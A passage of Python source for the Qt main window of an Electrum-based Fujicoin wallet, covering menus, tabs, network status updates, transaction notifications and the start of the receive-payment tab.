base_units, base_units_list, base_unit_name_to_decimal_point,
decimal_point_to_base_unit_name, quantize_feerate,
UnknownBaseUnit, DECIMAL_POINT_DEFAULT, UserFacingException,
get_new_wallet_name, send_exception_to_crash_reporter,
InvalidBitcoinURI)
from electrum.transaction import Transaction, TxOutput
from electrum.address_synchronizer import AddTransactionException
from electrum.wallet import (Multisig_Wallet, CannotBumpFee, Abstract_Wallet,
sweep_preparations, InternalAddressCorruption)
from electrum.version import ELECTRUM_VERSION
from electrum.network import Network, TxBroadcastError, BestEffortRequestFailed
from electrum.exchange_rate import FxThread
from electrum.simple_config import SimpleConfig
from electrum.logging import Logger
from electrum.paymentrequest import PR_PAID
from .exception_window import Exception_Hook
from .amountedit import AmountEdit, BTCAmountEdit, MyLineEdit, FeerateEdit
from .qrcodewidget import QRCodeWidget, QRDialog
from .qrtextedit import ShowQRTextEdit, ScanQRTextEdit
from .transaction_dialog import show_transaction
from .fee_slider import FeeSlider
from .util import (read_QIcon, ColorScheme, text_dialog, icon_path, WaitingDialog,
WindowModalDialog, ChoicesLayout, HelpLabel, FromList, Buttons,
OkButton, InfoButton, WWLabel, TaskThread, CancelButton,
CloseButton, HelpButton, MessageBoxMixin, EnterButton, expiration_values,
ButtonsLineEdit, CopyCloseButton, import_meta_gui, export_meta_gui,
filename_field, address_field, char_width_in_lineedit, webopen)
from .installwizard import WIF_HELP_TEXT
from .history_list import HistoryList, HistoryModel
from .update_checker import UpdateCheck, UpdateCheckThread
class StatusBarButton(QPushButton):
def __init__(self, icon, tooltip, func):
QPushButton.__init__(self, icon, '')
self.setToolTip(tooltip)
self.setFlat(True)
self.setMaximumWidth(25)
self.clicked.connect(self.onPress)
self.func = func
self.setIconSize(QSize(25,25))
self.setCursor(QCursor(Qt.PointingHandCursor))
def onPress(self, checked=False):
'''Drops the unwanted PyQt5 "checked" argument'''
self.func()
def keyPressEvent(self, e):
if e.key() == Qt.Key_Return:
self.func()
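# Illustrative usage (hedged sketch; the actual buttons are created later in this file,
# e.g. when the status bar is built):
#   sb.addPermanentWidget(StatusBarButton(read_QIcon("seed.png"), _("Seed"), self.show_seed_dialog))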
class ElectrumWindow(QMainWindow, MessageBoxMixin, Logger):
payment_request_ok_signal = pyqtSignal()
payment_request_error_signal = pyqtSignal()
new_fx_quotes_signal = pyqtSignal()
new_fx_history_signal = pyqtSignal()
network_signal = pyqtSignal(str, object)
alias_received_signal = pyqtSignal()
computing_privkeys_signal = pyqtSignal()
show_privkeys_signal = pyqtSignal()
def __init__(self, gui_object, wallet: Abstract_Wallet):
QMainWindow.__init__(self)
self.gui_object = gui_object
self.config = config = gui_object.config # type: SimpleConfig
self.gui_thread = gui_object.gui_thread
self.setup_exception_hook()
self.network = gui_object.daemon.network # type: Network
assert wallet, "no wallet"
self.wallet = wallet
self.fx = gui_object.daemon.fx # type: FxThread
self.invoices = wallet.invoices
self.contacts = wallet.contacts
self.tray = gui_object.tray
self.app = gui_object.app
self.cleaned_up = False
self.payment_request = None # type: Optional[paymentrequest.PaymentRequest]
self.checking_accounts = False
self.qr_window = None
self.not_enough_funds = False
self.pluginsdialog = None
self.require_fee_update = False
self.tl_windows = []
self.tx_external_keypairs = {}
Logger.__init__(self)
self.tx_notification_queue = queue.Queue()
self.tx_notification_last_time = 0
self.create_status_bar()
self.need_update = threading.Event()
self.decimal_point = config.get('decimal_point', DECIMAL_POINT_DEFAULT)
try:
decimal_point_to_base_unit_name(self.decimal_point)
except UnknownBaseUnit:
self.decimal_point = DECIMAL_POINT_DEFAULT
self.num_zeros = int(config.get('num_zeros', 0))
self.completions = QStringListModel()
self.tabs = tabs = QTabWidget(self)
self.send_tab = self.create_send_tab()
self.receive_tab = self.create_receive_tab()
self.addresses_tab = self.create_addresses_tab()
self.utxo_tab = self.create_utxo_tab()
self.console_tab = self.create_console_tab()
self.contacts_tab = self.create_contacts_tab()
tabs.addTab(self.create_history_tab(), read_QIcon("tab_history.png"), _('History'))
tabs.addTab(self.send_tab, read_QIcon("tab_send.png"), _('Send'))
tabs.addTab(self.receive_tab, read_QIcon("tab_receive.png"), _('Receive'))
def add_optional_tab(tabs, tab, icon, description, name):
tab.tab_icon = icon
tab.tab_description = description
tab.tab_pos = len(tabs)
tab.tab_name = name
if self.config.get('show_{}_tab'.format(name), False):
tabs.addTab(tab, icon, description.replace("&", ""))
add_optional_tab(tabs, self.addresses_tab, read_QIcon("tab_addresses.png"), _("&Addresses"), "addresses")
add_optional_tab(tabs, self.utxo_tab, read_QIcon("tab_coins.png"), _("Co&ins"), "utxo")
add_optional_tab(tabs, self.contacts_tab, read_QIcon("tab_contacts.png"), _("Con&tacts"), "contacts")
add_optional_tab(tabs, self.console_tab, read_QIcon("tab_console.png"), _("Con&sole"), "console")
tabs.setSizePolicy(QSizePolicy.Expanding, QSizePolicy.Expanding)
self.setCentralWidget(tabs)
if self.config.get("is_maximized"):
self.showMaximized()
self.setWindowIcon(read_QIcon("electrum.png"))
self.init_menubar()
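# Use a weak proxy so the shortcut lambdas below do not hold a strong reference to the
# tab widget (and hence to this window), which would prevent the window from being GC-ed.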
wrtabs = weakref.proxy(tabs)
QShortcut(QKeySequence("Ctrl+W"), self, self.close)
QShortcut(QKeySequence("Ctrl+Q"), self, self.close)
QShortcut(QKeySequence("Ctrl+R"), self, self.update_wallet)
QShortcut(QKeySequence("F5"), self, self.update_wallet)
QShortcut(QKeySequence("Ctrl+PgUp"), self, lambda: wrtabs.setCurrentIndex((wrtabs.currentIndex() - 1)%wrtabs.count()))
QShortcut(QKeySequence("Ctrl+PgDown"), self, lambda: wrtabs.setCurrentIndex((wrtabs.currentIndex() + 1)%wrtabs.count()))
for i in range(wrtabs.count()):
QShortcut(QKeySequence("Alt+" + str(i + 1)), self, lambda i=i: wrtabs.setCurrentIndex(i))
self.payment_request_ok_signal.connect(self.payment_request_ok)
self.payment_request_error_signal.connect(self.payment_request_error)
self.history_list.setFocus(True)
# network callbacks
if self.network:
self.network_signal.connect(self.on_network_qt)
interests = ['wallet_updated', 'network_updated', 'blockchain_updated',
'new_transaction', 'status',
'banner', 'verified', 'fee', 'fee_histogram']
# To avoid leaking references to "self" that prevent the
# window from being GC-ed when closed, callbacks should be
# methods of this class only, and specifically not be
# partials, lambdas or methods of subobjects. Hence...
self.network.register_callback(self.on_network, interests)
# set initial message
self.console.showMessage(self.network.banner)
self.network.register_callback(self.on_quotes, ['on_quotes'])
self.network.register_callback(self.on_history, ['on_history'])
self.new_fx_quotes_signal.connect(self.on_fx_quotes)
self.new_fx_history_signal.connect(self.on_fx_history)
# update fee slider in case we missed the callback
self.fee_slider.update()
self.load_wallet(wallet)
gui_object.timer.timeout.connect(self.timer_actions)
self.fetch_alias()
# If the option hasn't been set yet
if config.get('check_updates') is None:
choice = self.question(title="Electrum - " + _("Enable update check"),
msg=_("For security reasons we advise that you always use the latest version of Electrum.") + " " +
_("Would you like to be notified when there is a newer version of Electrum available?"))
config.set_key('check_updates', bool(choice), save=True)
if config.get('check_updates', False):
# The references to both the thread and the window need to be stored somewhere
# to prevent GC from getting in our way.
def on_version_received(v):
if UpdateCheck.is_newer(v):
self.update_check_button.setText(_("Update to Electrum {} is available").format(v))
self.update_check_button.clicked.connect(lambda: self.show_update_check(v))
self.update_check_button.show()
self._update_check_thread = UpdateCheckThread(self)
self._update_check_thread.checked.connect(on_version_received)
self._update_check_thread.start()
def on_history(self, b):
self.wallet.clear_coin_price_cache()
self.new_fx_history_signal.emit()
def setup_exception_hook(self):
Exception_Hook(self)
def on_fx_history(self):
self.history_model.refresh('fx_history')
self.address_list.update()
def on_quotes(self, b):
self.new_fx_quotes_signal.emit()
def on_fx_quotes(self):
self.update_status()
# Refresh edits with the new rate
edit = self.fiat_send_e if self.fiat_send_e.is_last_edited else self.amount_e
edit.textEdited.emit(edit.text())
edit = self.fiat_receive_e if self.fiat_receive_e.is_last_edited else self.receive_amount_e
edit.textEdited.emit(edit.text())
# History tab needs updating if it used spot
if self.fx.history_used_spot:
self.history_model.refresh('fx_quotes')
self.address_list.update()
def toggle_tab(self, tab):
show = not self.config.get('show_{}_tab'.format(tab.tab_name), False)
self.config.set_key('show_{}_tab'.format(tab.tab_name), show)
item_text = (_("Hide {}") if show else _("Show {}")).format(tab.tab_description)
tab.menu_action.setText(item_text)
if show:
# Find out where to place the tab
index = len(self.tabs)
for i in range(len(self.tabs)):
try:
if tab.tab_pos < self.tabs.widget(i).tab_pos:
index = i
break
except AttributeError:
pass
self.tabs.insertTab(index, tab, tab.tab_icon, tab.tab_description.replace("&", ""))
else:
i = self.tabs.indexOf(tab)
self.tabs.removeTab(i)
def push_top_level_window(self, window):
'''Used for e.g. the tx dialog box to ensure new dialogs are appropriately
parented. This used to be done by explicitly providing the parent
window, but hardware wallet prompts do not know their parent window.'''
self.tl_windows.append(window)
def pop_top_level_window(self, window):
self.tl_windows.remove(window)
def top_level_window(self, test_func=None):
'''Do the right thing in the presence of tx dialog windows'''
override = self.tl_windows[-1] if self.tl_windows else None
if override and test_func and not test_func(override):
override = None # only override if ok for test_func
return self.top_level_window_recurse(override, test_func)
def diagnostic_name(self):
#return '{}:{}'.format(self.__class__.__name__, self.wallet.diagnostic_name())
return self.wallet.diagnostic_name()
def is_hidden(self):
return self.isMinimized() or self.isHidden()
def show_or_hide(self):
if self.is_hidden():
self.bring_to_top()
else:
self.hide()
def bring_to_top(self):
self.show()
self.raise_()
def on_error(self, exc_info):
e = exc_info[1]
if isinstance(e, UserCancelled):
pass
elif isinstance(e, UserFacingException):
self.show_error(str(e))
else:
try:
self.logger.error("on_error", exc_info=exc_info)
except OSError:
pass # see #4418
self.show_error(str(e))
def on_network(self, event, *args):
if event == 'wallet_updated':
wallet = args[0]
if wallet == self.wallet:
self.need_update.set()
elif event == 'network_updated':
self.gui_object.network_updated_signal_obj.network_updated_signal \
.emit(event, args)
self.network_signal.emit('status', None)
elif event == 'blockchain_updated':
# to update number of confirmations in history
self.need_update.set()
elif event == 'new_transaction':
wallet, tx = args
if wallet == self.wallet:
self.tx_notification_queue.put(tx)
elif event in ['status', 'banner', 'verified', 'fee', 'fee_histogram']:
# Handle in GUI thread
self.network_signal.emit(event, args)
else:
self.logger.info(f"unexpected network message: {event} {args}")
def on_network_qt(self, event, args=None):
# Handle a network message in the GUI thread
if event == 'status':
self.update_status()
elif event == 'banner':
self.console.showMessage(args[0])
elif event == 'verified':
wallet, tx_hash, tx_mined_status = args
if wallet == self.wallet:
self.history_model.update_tx_mined_status(tx_hash, tx_mined_status)
elif event == 'fee':
if self.config.is_dynfee():
self.fee_slider.update()
self.require_fee_update = True
elif event == 'fee_histogram':
if self.config.is_dynfee():
self.fee_slider.update()
self.require_fee_update = True
self.history_model.on_fee_histogram()
else:
self.logger.info(f"unexpected network_qt signal: {event} {args}")
def fetch_alias(self):
self.alias_info = None
alias = self.config.get('alias')
if alias:
alias = str(alias)
def f():
self.alias_info = self.contacts.resolve_openalias(alias)
self.alias_received_signal.emit()
t = threading.Thread(target=f)
t.setDaemon(True)
t.start()
def close_wallet(self):
if self.wallet:
self.logger.info(f'close_wallet {self.wallet.storage.path}')
run_hook('close_wallet', self.wallet)
@profiler
def load_wallet(self, wallet):
wallet.thread = TaskThread(self, self.on_error)
self.update_recently_visited(wallet.storage.path)
self.need_update.set()
# Once the GUI has been initialized, check whether we want to announce something,
# since the callback may already have been called before the GUI existed.
# update menus
self.seed_menu.setEnabled(self.wallet.has_seed())
self.update_lock_icon()
self.update_buttons_on_seed()
self.update_console()
self.clear_receive_tab()
self.request_list.update()
self.tabs.show()
self.init_geometry()
if self.config.get('hide_gui') and self.gui_object.tray.isVisible():
self.hide()
else:
self.show()
self.watching_only_changed()
run_hook('load_wallet', wallet, self)
try:
wallet.try_detecting_internal_addresses_corruption()
except InternalAddressCorruption as e:
self.show_error(str(e))
send_exception_to_crash_reporter(e)
def init_geometry(self):
winpos = self.wallet.storage.get("winpos-qt")
try:
screen = self.app.desktop().screenGeometry()
assert screen.contains(QRect(*winpos))
self.setGeometry(*winpos)
except:
self.logger.info("using default geometry")
self.setGeometry(100, 100, 840, 400)
def watching_only_changed(self):
name = "Electrum Testnet" if constants.net.TESTNET else "Electrum"
title = '%s %s - %s' % (name, ELECTRUM_VERSION,
self.wallet.basename())
extra = [self.wallet.storage.get('wallet_type', '?')]
if self.wallet.is_watching_only():
extra.append(_('watching only'))
title += ' [%s]'% ', '.join(extra)
self.setWindowTitle(title)
self.password_menu.setEnabled(self.wallet.may_have_password())
self.import_privkey_menu.setVisible(self.wallet.can_import_privkey())
self.import_address_menu.setVisible(self.wallet.can_import_address())
self.export_menu.setEnabled(self.wallet.can_export())
def warn_if_watching_only(self):
if self.wallet.is_watching_only():
msg = ' '.join([
_("This wallet is watching-only."),
_("This means you will not be able to spend Fujicoins with it."),
_("Make sure you own the seed phrase or the private keys, before you request Fujicoins to be sent to this wallet.")
])
self.show_warning(msg, title=_('Watch-only wallet'))
def warn_if_testnet(self):
if not constants.net.TESTNET:
return
# user might have opted out already
if self.config.get('dont_show_testnet_warning', False):
return
# only show once per process lifecycle
if getattr(self.gui_object, '_warned_testnet', False):
return
self.gui_object._warned_testnet = True
msg = ''.join([
_("You are in testnet mode."), ' ',
_("Testnet coins are worthless."), '\n',
_("Testnet is separate from the main Fujicoin network. It is used for testing.")
])
cb = QCheckBox(_("Don't show this again."))
cb_checked = False
def on_cb(x):
nonlocal cb_checked
cb_checked = x == Qt.Checked
cb.stateChanged.connect(on_cb)
self.show_warning(msg, title=_('Testnet'), checkbox=cb)
if cb_checked:
self.config.set_key('dont_show_testnet_warning', True)
def open_wallet(self):
try:
wallet_folder = self.get_wallet_folder()
except FileNotFoundError as e:
self.show_error(str(e))
return
filename, __ = QFileDialog.getOpenFileName(self, "Select your wallet file", wallet_folder)
if not filename:
return
self.gui_object.new_window(filename)
def backup_wallet(self):
path = self.wallet.storage.path
wallet_folder = os.path.dirname(path)
filename, __ = QFileDialog.getSaveFileName(self, _('Enter a filename for the copy of your wallet'), wallet_folder)
if not filename:
return
new_path = os.path.join(wallet_folder, filename)
if new_path != path:
try:
shutil.copy2(path, new_path)
self.show_message(_("A copy of your wallet file was created in")+" '%s'" % str(new_path), title=_("Wallet backup created"))
except BaseException as reason:
self.show_critical(_("Electrum was unable to copy your wallet file to the specified location.") + "\n" + str(reason), title=_("Unable to create backup"))
def update_recently_visited(self, filename):
recent = self.config.get('recently_open', [])
try:
sorted(recent)
except:
recent = []
if filename in recent:
recent.remove(filename)
recent.insert(0, filename)
recent = [path for path in recent if os.path.exists(path)]
recent = recent[:5]
self.config.set_key('recently_open', recent)
self.recently_visited_menu.clear()
for i, k in enumerate(sorted(recent)):
b = os.path.basename(k)
def loader(k):
return lambda: self.gui_object.new_window(k)
self.recently_visited_menu.addAction(b, loader(k)).setShortcut(QKeySequence("Ctrl+%d"%(i+1)))
self.recently_visited_menu.setEnabled(len(recent))
def get_wallet_folder(self):
return os.path.dirname(os.path.abspath(self.config.get_wallet_path()))
def new_wallet(self):
try:
wallet_folder = self.get_wallet_folder()
except FileNotFoundError as e:
self.show_error(str(e))
return
filename = get_new_wallet_name(wallet_folder)
full_path = os.path.join(wallet_folder, filename)
self.gui_object.start_new_window(full_path, None)
def init_menubar(self):
menubar = QMenuBar()
file_menu = menubar.addMenu(_("&File"))
self.recently_visited_menu = file_menu.addMenu(_("&Recently open"))
file_menu.addAction(_("&Open"), self.open_wallet).setShortcut(QKeySequence.Open)
file_menu.addAction(_("&New/Restore"), self.new_wallet).setShortcut(QKeySequence.New)
file_menu.addAction(_("&Save Copy"), self.backup_wallet).setShortcut(QKeySequence.SaveAs)
file_menu.addAction(_("Delete"), self.remove_wallet)
file_menu.addSeparator()
file_menu.addAction(_("&Quit"), self.close)
wallet_menu = menubar.addMenu(_("&Wallet"))
wallet_menu.addAction(_("&Information"), self.show_master_public_keys)
wallet_menu.addSeparator()
self.password_menu = wallet_menu.addAction(_("&Password"), self.change_password_dialog)
self.seed_menu = wallet_menu.addAction(_("&Seed"), self.show_seed_dialog)
self.private_keys_menu = wallet_menu.addMenu(_("&Private keys"))
self.private_keys_menu.addAction(_("&Sweep"), self.sweep_key_dialog)
self.import_privkey_menu = self.private_keys_menu.addAction(_("&Import"), self.do_import_privkey)
self.export_menu = self.private_keys_menu.addAction(_("&Export"), self.export_privkeys_dialog)
self.import_address_menu = wallet_menu.addAction(_("Import addresses"), self.import_addresses)
wallet_menu.addSeparator()
addresses_menu = wallet_menu.addMenu(_("&Addresses"))
addresses_menu.addAction(_("&Filter"), lambda: self.address_list.toggle_toolbar(self.config))
labels_menu = wallet_menu.addMenu(_("&Labels"))
labels_menu.addAction(_("&Import"), self.do_import_labels)
labels_menu.addAction(_("&Export"), self.do_export_labels)
history_menu = wallet_menu.addMenu(_("&History"))
history_menu.addAction(_("&Filter"), lambda: self.history_list.toggle_toolbar(self.config))
history_menu.addAction(_("&Summary"), self.history_list.show_summary)
history_menu.addAction(_("&Plot"), self.history_list.plot_history_dialog)
history_menu.addAction(_("&Export"), self.history_list.export_history_dialog)
contacts_menu = wallet_menu.addMenu(_("Contacts"))
contacts_menu.addAction(_("&New"), self.new_contact_dialog)
contacts_menu.addAction(_("Import"), lambda: self.contact_list.import_contacts())
contacts_menu.addAction(_("Export"), lambda: self.contact_list.export_contacts())
invoices_menu = wallet_menu.addMenu(_("Invoices"))
invoices_menu.addAction(_("Import"), lambda: self.invoice_list.import_invoices())
invoices_menu.addAction(_("Export"), lambda: self.invoice_list.export_invoices())
wallet_menu.addSeparator()
wallet_menu.addAction(_("Find"), self.toggle_search).setShortcut(QKeySequence("Ctrl+F"))
def add_toggle_action(view_menu, tab):
is_shown = self.config.get('show_{}_tab'.format(tab.tab_name), False)
item_name = (_("Hide") if is_shown else _("Show")) + " " + tab.tab_description
tab.menu_action = view_menu.addAction(item_name, lambda: self.toggle_tab(tab))
view_menu = menubar.addMenu(_("&View"))
add_toggle_action(view_menu, self.addresses_tab)
add_toggle_action(view_menu, self.utxo_tab)
add_toggle_action(view_menu, self.contacts_tab)
add_toggle_action(view_menu, self.console_tab)
tools_menu = menubar.addMenu(_("&Tools"))
# "Settings" and "Preferences" are reserved menu titles on macOS, so use a different label as a workaround.
tools_menu.addAction(_("Electrum preferences") if sys.platform == 'darwin' else _("Preferences"), self.settings_dialog)
tools_menu.addAction(_("&Network"), lambda: self.gui_object.show_network_dialog(self))
tools_menu.addAction(_("&Plugins"), self.plugins_dialog)
tools_menu.addSeparator()
tools_menu.addAction(_("&Sign/verify message"), self.sign_verify_message)
tools_menu.addAction(_("&Encrypt/decrypt message"), self.encrypt_message)
tools_menu.addSeparator()
paytomany_menu = tools_menu.addAction(_("&Pay to many"), self.paytomany)
raw_transaction_menu = tools_menu.addMenu(_("&Load transaction"))
raw_transaction_menu.addAction(_("&From file"), self.do_process_from_file)
raw_transaction_menu.addAction(_("&From text"), self.do_process_from_text)
raw_transaction_menu.addAction(_("&From the blockchain"), self.do_process_from_txid)
raw_transaction_menu.addAction(_("&From QR code"), self.read_tx_from_qrcode)
self.raw_transaction_menu = raw_transaction_menu
run_hook('init_menubar_tools', self, tools_menu)
help_menu = menubar.addMenu(_("&Help"))
help_menu.addAction(_("&About"), self.show_about)
help_menu.addAction(_("&Check for updates"), self.show_update_check)
help_menu.addAction(_("&Official website"), lambda: webopen("https://www.fujicoin.org"))
help_menu.addSeparator()
help_menu.addAction(_("&Documentation"), lambda: webopen("http://docs.electrum.org/")).setShortcut(QKeySequence.HelpContents)
help_menu.addAction(_("&Report Bug"), self.show_report_bug)
help_menu.addSeparator()
help_menu.addAction(_("&Donate to server"), self.donate_to_server)
self.setMenuBar(menubar)
def donate_to_server(self):
d = self.network.get_donation_address()
if d:
host = self.network.get_parameters().host
self.pay_to_URI('fujicoin:%s?message=donation for %s'%(d, host))
else:
self.show_error(_('No donation address for this server'))
def show_about(self):
QMessageBox.about(self, "Electrum",
(_("Version")+" %s" % ELECTRUM_VERSION + "\n\n" +
_("Electrum's focus is speed, with low resource usage and simplifying Fujicoin.") + " " +
_("You do not need to perform regular backups, because your wallet can be "
"recovered from a secret phrase that you can memorize or write on paper.") + " " +
_("Startup times are instant because it operates in conjunction with high-performance "
"servers that handle the most complicated parts of the Fujicoin system.") + "\n\n" +
_("Uses icons from the Icons8 icon pack (icons8.com).")))
def show_update_check(self, version=None):
self.gui_object._update_check = UpdateCheck(self, version)
def show_report_bug(self):
msg = ' '.join([
_("Please report any bugs as issues on github:<br/>"),
f'''<a href="{constants.GIT_REPO_ISSUES_URL}">{constants.GIT_REPO_ISSUES_URL}</a><br/><br/>''',
_("Before reporting a bug, upgrade to the most recent version of Electrum (latest release or git HEAD), and include the version number in your report."),
_("Try to explain not only what the bug is, but how it occurs.")
])
self.show_message(msg, title="Electrum - " + _("Reporting Bugs"), rich_text=True)
def notify_transactions(self):
if self.tx_notification_queue.qsize() == 0:
return
if not self.wallet.up_to_date:
return # no notifications while syncing
now = time.time()
rate_limit = 20 # seconds
if self.tx_notification_last_time + rate_limit > now:
return
self.tx_notification_last_time = now
self.logger.info("Notifying GUI about new transactions")
txns = []
while True:
try:
txns.append(self.tx_notification_queue.get_nowait())
except queue.Empty:
break
# Combine the transactions if there are at least three
if len(txns) >= 3:
total_amount = 0
for tx in txns:
is_relevant, is_mine, v, fee = self.wallet.get_wallet_delta(tx)
if not is_relevant:
continue
total_amount += v
self.notify(_("{} new transactions: Total amount received in the new transactions {}")
.format(len(txns), self.format_amount_and_units(total_amount)))
else:
for tx in txns:
is_relevant, is_mine, v, fee = self.wallet.get_wallet_delta(tx)
if not is_relevant:
continue
self.notify(_("New transaction: {}").format(self.format_amount_and_units(v)))
def notify(self, message):
if self.tray:
try:
# this requires Qt 5.9
self.tray.showMessage("Electrum", message, read_QIcon("electrum_dark_icon"), 20000)
except TypeError:
self.tray.showMessage("Electrum", message, QSystemTrayIcon.Information, 20000)
# Custom wrappers for getOpenFileName and getSaveFileName that remember the path selected by the user.
def getOpenFileName(self, title, filter = ""):
directory = self.config.get('io_dir', os.path.expanduser('~'))
fileName, __ = QFileDialog.getOpenFileName(self, title, directory, filter)
if fileName and directory != os.path.dirname(fileName):
self.config.set_key('io_dir', os.path.dirname(fileName), True)
return fileName
def getSaveFileName(self, title, filename, filter = ""):
directory = self.config.get('io_dir', os.path.expanduser('~'))
path = os.path.join( directory, filename )
fileName, __ = QFileDialog.getSaveFileName(self, title, path, filter)
if fileName and directory != os.path.dirname(fileName):
self.config.set_key('io_dir', os.path.dirname(fileName), True)
return fileName
def timer_actions(self):
# Note this runs in the GUI thread
if self.need_update.is_set():
self.need_update.clear()
self.update_wallet()
elif not self.wallet.up_to_date:
# this updates "synchronizing" progress
self.update_status()
# resolve aliases
# FIXME this is a blocking network call that has a timeout of 5 sec
self.payto_e.resolve()
# update fee
if self.require_fee_update:
self.do_update_fee()
self.require_fee_update = False
self.notify_transactions()
def format_amount(self, x, is_diff=False, whitespaces=False):
return format_satoshis(x, self.num_zeros, self.decimal_point, is_diff=is_diff, whitespaces=whitespaces)
def format_amount_and_units(self, amount):
text = self.format_amount(amount) + ' '+ self.base_unit()
x = self.fx.format_amount_and_units(amount) if self.fx else None
if text and x:
text += ' (%s)'%x
return text
def format_fee_rate(self, fee_rate):
# fee_rate is in sat/kB
return format_fee_satoshis(fee_rate/1000, num_zeros=self.num_zeros) + ' sat/byte'
def get_decimal_point(self):
return self.decimal_point
def base_unit(self):
return decimal_point_to_base_unit_name(self.decimal_point)
def connect_fields(self, window, btc_e, fiat_e, fee_e):
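# Keep the BTC and fiat edits mirrored; the 'follows' flag stops a programmatic update
# of one field from re-triggering this handler on the other field.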
def edit_changed(edit):
if edit.follows:
return
edit.setStyleSheet(ColorScheme.DEFAULT.as_stylesheet())
fiat_e.is_last_edited = (edit == fiat_e)
amount = edit.get_amount()
rate = self.fx.exchange_rate() if self.fx else Decimal('NaN')
if rate.is_nan() or amount is None:
if edit is fiat_e:
btc_e.setText("")
if fee_e:
fee_e.setText("")
else:
fiat_e.setText("")
else:
if edit is fiat_e:
btc_e.follows = True
btc_e.setAmount(int(amount / Decimal(rate) * COIN))
btc_e.setStyleSheet(ColorScheme.BLUE.as_stylesheet())
btc_e.follows = False
if fee_e:
window.update_fee()
else:
fiat_e.follows = True
fiat_e.setText(self.fx.ccy_amount_str(
amount * Decimal(rate) / COIN, False))
fiat_e.setStyleSheet(ColorScheme.BLUE.as_stylesheet())
fiat_e.follows = False
btc_e.follows = False
fiat_e.follows = False
fiat_e.textChanged.connect(partial(edit_changed, fiat_e))
btc_e.textChanged.connect(partial(edit_changed, btc_e))
fiat_e.is_last_edited = False
def update_status(self):
if not self.wallet:
return
if self.network is None:
text = _("Offline")
icon = read_QIcon("status_disconnected.png")
elif self.network.is_connected():
server_height = self.network.get_server_height()
server_lag = self.network.get_local_height() - server_height
fork_str = "_fork" if len(self.network.get_blockchains())>1 else ""
# Server height can be 0 after switching to a new server
# until we get a headers subscription request response.
# Display the synchronizing message in that case.
if not self.wallet.up_to_date or server_height == 0:
num_sent, num_answered = self.wallet.get_history_sync_state_details()
text = ("{} ({}/{})"
.format(_("Synchronizing..."), num_answered, num_sent))
icon = read_QIcon("status_waiting.png")
elif server_lag > 1:
text = _("Server is lagging ({} blocks)").format(server_lag)
icon = read_QIcon("status_lagging%s.png"%fork_str)
else:
c, u, x = self.wallet.get_balance()
text = _("Balance" ) + ": %s "%(self.format_amount_and_units(c))
if u:
text += " [%s unconfirmed]"%(self.format_amount(u, is_diff=True).strip())
if x:
text += " [%s unmatured]"%(self.format_amount(x, is_diff=True).strip())
# append fiat balance and price
if self.fx.is_enabled():
text += self.fx.get_fiat_status_text(c + u + x,
self.base_unit(), self.get_decimal_point()) or ''
if not self.network.proxy:
icon = read_QIcon("status_connected%s.png"%fork_str)
else:
icon = read_QIcon("status_connected_proxy%s.png"%fork_str)
else:
if self.network.proxy:
text = "{} ({})".format(_("Not connected"), _("proxy enabled"))
else:
text = _("Not connected")
icon = read_QIcon("status_disconnected.png")
self.tray.setToolTip("%s (%s)" % (text, self.wallet.basename()))
self.balance_label.setText(text)
self.status_button.setIcon( icon )
def update_wallet(self):
self.update_status()
if self.wallet.up_to_date or not self.network or not self.network.is_connected():
self.update_tabs()
def update_tabs(self, wallet=None):
if wallet is None:
wallet = self.wallet
if wallet != self.wallet:
return
self.history_model.refresh('update_tabs')
self.request_list.update()
self.address_list.update()
self.utxo_list.update()
self.contact_list.update()
self.invoice_list.update()
self.update_completions()
def create_history_tab(self):
self.history_model = HistoryModel(self)
self.history_list = l = HistoryList(self, self.history_model)
self.history_model.set_view(self.history_list)
l.searchable_list = l
toolbar = l.create_toolbar(self.config)
toolbar_shown = self.config.get('show_toolbar_history', False)
l.show_toolbar(toolbar_shown)
return self.create_list_tab(l, toolbar)
def show_address(self, addr):
from . import address_dialog
d = address_dialog.AddressDialog(self, addr)
d.exec_()
def show_transaction(self, tx, tx_desc = None):
'''tx_desc is set only for txs created in the Send tab'''
show_transaction(tx, self, tx_desc)
def create_receive_tab(self):
# A 4-column grid layout. All the stretch is in the last column.
# The exchange rate plugin adds a fiat widget in column 2
self.receive_grid = grid = QGridLayout()
grid.setSpacing(8)
grid.setColumnStretch(3, 1)
self.receive_address_e = ButtonsLineEdit()
self.receive_address_e.addCopyButton(self.app)
self.receive_address_e.setReadOnly(True)
msg = _('Fujicoin address where the payment should be received. Note that each payment request uses a different Fujicoin address.')
self.receive_address_label = HelpLabel(_('Receiving address'), msg)
self.receive_address_e.textChanged.connect(self.update_receive_qr)
self.receive_address_e.textChanged.connect(self.update_receive_address_styling)
self.receive_address_e.setFocusPolicy(Qt.ClickFocus)
grid.addWidget(self.receive_address_label, 0, 0)
grid.addWidget(self.receive_address_e, 0, 1, 1, -1)
self.receive_message_e = QLineEdit()
grid.addWidget(QLabel(_('Description')), 1, 0)
grid.addWidget(self.receive_message_e, 1, 1, 1, -1)
self.receive_message_e.textChanged.connect(self.update_receive_qr)
self.receive_amount_e = BTCAmountEdit(self.get_decimal_point)
grid.addWidget(QLabel(_('Requested amount')), 2, 0)
grid.addWidget(self.receive_amount_e, 2, 1)
self.receive_amount_e.textChanged.connect(self.update_receive_qr)
self.fiat_receive_e = AmountEdit(self.fx.get_currency if self.fx else '')
if not self.fx or not self.fx.is_enabled():
self.fiat_receive_e.setVisible(False)
grid.addWidget(self.fiat_receive_e, 2, 2, Qt.AlignLeft)
self.connect_fields(self, self.receive_amount_e, self.fiat_receive_e, None)
self.expires_combo = QComboBox()
self.expires_combo.addItems([i[0] for i in expiration_values])
self.expires_combo.setCurrentIndex(3)
self.expires_combo.setFixedWidth(self.receive_amount_e.width())
msg = ' '.join([
_('Expiration date of your request.'),
_('This information is seen by the recipient if you send them a signed payment request.'),
_('Expired requests have to be deleted manually from your list, in order to free the corresponding Fujicoin addresses.'),
_('The Fujicoin address never expires and will always be part of this Electrum wallet.'),
])
grid.addWidget(HelpLabel(_('Request expires'), msg), 3, 0)
grid.addWidget(self.expires_combo, 3, 1)
self.expires_label = QLineEdit('')
self.expires_label.setReadOnly(1)
self.expires_label.setFocusPolicy(Qt.NoFocus)
self.expires_label.hide()
grid.addWidget(self.expires_label, 3, 1)
self.save_request_button = QPushButton(_('Save'))
self.save_request_button.clicked.connect(self.save_payment_request)
self.new_request_button = QPushButton(_('New'))
self.new_request_button.clicked.connect(self.new_payment_request)
self.receive_qr = QRCodeWidget(fixedSize=200)
self.receive_qr.mouseReleaseEvent = lambda x: self.toggle_qr_window()
self.receive_qr.enterEvent = lambda x: self.app.setOverrideCursor(QCursor(Qt.PointingHandCursor))
